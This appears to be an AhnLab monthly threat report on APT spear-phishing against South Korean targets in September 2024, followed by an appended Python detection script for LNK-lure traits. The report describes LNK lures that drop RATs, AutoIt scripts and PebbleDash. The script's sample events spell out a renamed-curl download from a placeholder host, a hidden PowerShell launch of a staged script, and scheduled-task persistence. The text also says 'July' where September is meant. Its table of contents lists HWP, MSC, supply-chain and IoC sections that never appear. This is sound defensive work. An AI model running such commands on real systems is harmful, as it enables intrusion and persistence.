Threat Trend Report on APT Attacks (South Korea) – September 2024
Major Issues on APT Attacks in South Korea

This report covers the classification and statistics of APT attacks against domestic targets confirmed during September 2024 and introduces the features of each type. Below is a summary of some of the information.

[Table of Contents]

  • Overview
  • Trends of APT Attacks in Korea
    • Spear Phishing
      • Attacks Using LNK Files
      • Attacks Using HWP Files
      • Attacks Using MSC Files
      • Attacks Using CHM Files
    • Supply Chain Attack
      • Attacks Using EXE Files
  • AhnLab Response Overview
  • Conclusion
  • IoC (Indicators of Compromise)
    • Key File Names
    • File Hashes (MD5s)
    • Relevant Domains, URLs, and IP Addresses

[Overview]

AhnLab has been using AhnLab Smart Defense (ASD) to monitor advanced persistent threat (APT) attacks against targets in Korea. This report will cover the types and statistics of APT attacks in Korea during September 2024 as well as features of each type.

Figure 1. September 2024 statistics on APT attacks in Korea

APT attacks against Korean targets have been categorized by penetration type, and most were found to be spear phishing. In September 2024, spear phishing attacks using HWP and MSC file extensions were found in large numbers.


[Trends of APT Attacks in Korea]

The cases and features of each APT attack type identified in July 2024 are as follows.

1) Spear Phishing

Spear phishing is a type of phishing attack aimed at specific individuals or groups. Unlike ordinary phishing attacks, the threat actor conducts reconnaissance before launching the attack to collect information on and learn about the targets. Because the threat actor crafts the phishing emails using the collected information, the recipients are highly likely to believe that the emails come from a trusted source. There are also cases where the sender’s address is manipulated through email spoofing. Most spear phishing attacks include malicious attachments or links that are intended to lure the user into opening them.

The types distributed using this technique are as follows.

1.1 Attacks Using LNK Files

Type A

This type executes RAT malware. The LNK files are generally distributed in compressed archives alongside legitimate files, and those found in distribution contained malicious PowerShell commands. Besides using the Dropbox API or Google Drive to download malware, the recently identified LNK files also create additional script files and an obfuscated RAT in the TEMP or PUBLIC folder upon execution. The RAT malware that ultimately runs can perform various malicious behaviors, such as keylogging and taking screenshots, according to commands from the threat actor. XenoRAT and RoKRAT were among the RAT types found in this case.

The confirmed file name is as follows.

File Name
le.docx.lnk
Table 1. Confirmed file name

Type B

This type downloads AutoIt malware. When the malicious PowerShell command included in the LNK file is executed, it connects to an external URL to download additional files. A notable feature of this process is that it copies the curl.exe program under a different file name (such as VezoQxO.exe) and then executes that copy. Ultimately, a legitimate AutoIt program and a malicious AutoIt script are downloaded, and the downloaded files are registered in the Task Scheduler so that they keep being executed.

The confirmed file names are as follows.

File Name
2024 Energy Technology Development Project Final Evaluation Committee Member Appointment Guide.pdf.lnk
Unreported Statement for Source of Funds (Enforcement Ordinance of the Value-Added Tax Act).hwp.lnk
Table 2. Confirmed file name

Type C

This type creates numerous obfuscated scripts in the ProgramData folder to download a backdoor. The generated script files work together as a chain and are characterized by having .tmp or .dat extensions. When a script file is executed, it connects to a C2 server to download and execute additional PowerShell scripts. Ultimately, RDP Wrapper is installed on the user’s PC, which is then used to download and execute backdoors such as PebbleDash.

The confirmed file names are as follows.

File Name
Upbit_20240916 docx lnk.lnk
Subsidy Application Related Inquiry.docx lnk.lnk
Table 3. Confirmed file name
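As an added example (not code from the report or from AhnLab), the heuristics below turn the Type A, B and C traits described above into checks a defender can run over file names and process-creation records: double-extension LNK lures such as ".docx.lnk" or " docx lnk.lnk", curl.exe running under a different image name (caught through the PE OriginalFileName field), script hosts launching .tmp/.dat files from ProgramData, TEMP or Public, and schtasks registrations pointing into those folders. The sample events are constructed and only borrow Sysmon Event ID 1 field names; the rule names and thresholds are this example's own assumptions.

```python
import re

# Lure names from the report: "<name>.<docext>.lnk" and the "<name> docx lnk.lnk" form
LURE_DOC_EXTS = ("docx", "doc", "xlsx", "xls", "pptx", "ppt", "pdf", "hwp")
DOUBLE_EXT_LNK = re.compile(
    r"(?:^|[.\s])(?:%s)(?:[.\s]lnk)*[.\s]lnk$" % "|".join(LURE_DOC_EXTS), re.I)
# Folders the report names for staged payloads (ProgramData, TEMP, PUBLIC)
USER_WRITABLE = r"\\(?:ProgramData|Temp|Users\\Public)\\"
STAGED_SCRIPT = re.compile(USER_WRITABLE + r"[^\s\"']*\.(?:tmp|dat)\b", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe"}

def is_lure_lnk(filename: str) -> bool:
    """True when a shortcut masquerades as a document, e.g. 'x.pdf.lnk'."""
    return DOUBLE_EXT_LNK.search(filename.strip()) is not None

def analyze_event(ev: dict) -> list:
    """Return the rule names a Sysmon-style process-creation event matches."""
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    hits = []
    # Type B: curl.exe copied to a random name keeps 'curl.exe' as its PE OriginalFileName
    if ev.get("OriginalFileName", "").lower() == "curl.exe" and image != "curl.exe":
        hits.append("renamed_curl")
    # Type A/C: a script host handed a .tmp/.dat file from a user-writable folder
    if image in SCRIPT_HOSTS and STAGED_SCRIPT.search(cmd):
        hits.append("staged_script")
    # Type B: scheduled task created to re-run content from a user-writable folder
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) \
            and re.search(USER_WRITABLE, cmd, re.I):
        hits.append("schtasks_persistence")
    return hits

def scan(events: list) -> list:
    """Hit list per event, in input order ([] means clean)."""
    return [analyze_event(ev) for ev in events]

# Constructed sample events (Sysmon Event ID 1 field names); not data from the report
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\u\AppData\Local\Temp\VezoQxO.exe", "OriginalFileName": "curl.exe",
     "ParentImage": PS, "CommandLine": r"VezoQxO.exe -o C:\Users\Public\a.dat http://example.invalid/a"},
    {"Image": PS, "OriginalFileName": "PowerShell.EXE", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -w hidden -f C:\ProgramData\svc.tmp"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe", "ParentImage": PS,
     "CommandLine": r'schtasks.exe /create /sc minute /mo 10 /tn Upd /tr "C:\Users\Public\AutoIt3.exe C:\Users\Public\s.au3"'},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "curl.exe https://example.invalid/"},
]
```

Running `scan(SAMPLE_EVENTS)` flags the first three constructed events with one rule each and reports the genuine curl.exe launch as clean.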
